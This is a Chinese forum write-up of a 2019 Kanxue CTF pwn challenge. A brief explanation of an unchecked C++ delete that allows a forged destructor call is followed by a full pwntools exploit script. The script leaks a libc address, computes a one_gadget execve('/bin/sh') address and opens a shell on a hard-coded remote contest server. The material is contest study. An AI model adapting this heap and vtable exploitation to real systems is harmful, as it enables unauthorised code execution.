首页
社区
课程
招聘
[原创]【2019看雪CTF】Q1赛季 第九题 C与C++ WP
2019-3-23 21:00 2994

[原创]【2019看雪CTF】Q1赛季 第九题 C与C++ WP

2019-3-23 21:00
2994

【2019看雪CTF】Q1赛季 第九题 C与C++ WP

delete操作并未作严格检查,可以malloc申请的对非对象空间进行操作,如果构造得当,伪造析构函数,通过delete操作的析构来作函数调用,可以实现leak及get shell,leak还要借助菜单函数中并不会执行的调用函数sub_400E10。至于函数指针,就需要用到开头输入的名字。完整exp如下:

#!/usr/bin/env python
from pwn import *


def login(name):
    io.recvuntil('your name: ')
    io.sendline(name)

def malloc(size,content):
    io.recvuntil('>> ')
    io.sendline('1')
    io.recvuntil('length of the string\n')
    io.sendline(str(size))
    io.recvuntil("input the string\n")
    io.sendline(content)

def new(size,content):
    io.recvuntil('>> ')
    io.sendline('3')
    io.recvuntil('length of the string\n')
    io.sendline(str(size))
    io.recvuntil("input the string\n")
    io.sendline(content)

def free(idx):
    io.recvuntil('>> ')
    io.sendline('2')
    io.recvuntil('index of the string\n')
    io.sendline(str(idx))


def delete(idx):
    io.recvuntil('>> ')
    io.sendline('4')
    io.recvuntil('index of the string\n')
    io.sendline(str(idx))

def puts(idx):
    io.recvuntil('>> ')
    io.sendline('5')
    io.recvuntil('index of the string\n')
    io.sendline(str(idx))
    return io.recvline()[:-1]


def pwn():

    sys_off = 0x45390
    puts_off = 0x6F690
    one_off = 0xf02a4
    '''0x45216  execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''

    login(p64(0x400E10)+p64(0x4009A0)[:-1])
    malloc(8,'a'*8+p64(0x18))
    new(0x1ef,(p64(0x401228)+'\x00'*7)*0x1d+p64(0x602328+8)+'\x00'*7+p64(0x602328))
    # gdb.attach(io,'b *0x400D90')
    delete(0)
    puts_addr = int(io.recv(14)[2:],16)
    one_addr = puts_addr - puts_off + one_off
    login(p64(one_addr))
    malloc(8,'a'*8+p64(0x18))
    new(0x1ef,(p64(0x401228)+'\x00'*7)*0x1e+p64(0x602328))
    delete(2)
    log.info('get shell...')
    io.interactive()



if __name__  ==  '__main__':
    context(arch='amd64', kernel='amd64', os='linux')    
    HOST, PORT = '154.8.222.144', 9999
    # elf = ELF('./libc.so.6')    
    if len(sys.argv) > 1 and sys.argv[1] == 'l': 
        io = process('./candcpp')        
        context.log_level = 'debug'        
    else:   
        io = remote(HOST, PORT)  
        # context.log_level = 'debug'             
    pwn()

[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

收藏
免费 1
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回